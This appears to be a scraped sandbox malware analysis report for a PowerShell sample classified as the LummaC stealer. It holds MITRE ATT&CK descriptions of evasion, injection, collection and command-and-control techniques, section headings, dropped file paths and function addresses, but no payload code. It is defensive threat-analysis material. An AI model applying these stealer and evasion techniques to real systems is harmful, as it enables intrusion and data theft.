Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 176.113.115.170_3.ps1

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

Memory Dumps

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zjmy13bq.q3t.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zxoq33oo.abw.psm1

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\OH3N2M3RR0S467KQRNFP.temp

Static File Info

General

File Icon

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

Windows Analysis Report
176.113.115.170_3.ps1

Function 00408880 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 180
threadCOMMON

Function 0040B2B0 Relevance: 9.3, Strings: 7, Instructions: 518
COMMON

Function 0040AA32 Relevance: 2.6, Strings: 2, Instructions: 64
COMMON

Function 004402C0 Relevance: 1.5, APIs: 1, Instructions: 14
libraryCOMMON

Function 00439823 Relevance: 1.6, APIs: 1, Instructions: 74
COMMON

Function 00440260 Relevance: 1.5, APIs: 1, Instructions: 30
memoryCOMMON

Function 0043EB40 Relevance: 1.5, APIs: 1, Instructions: 15
memoryCOMMON

Function 004404B1 Relevance: 1.5, APIs: 1, Instructions: 15
COMMON

Function 0043EB20 Relevance: 1.5, APIs: 1, Instructions: 9
memoryCOMMON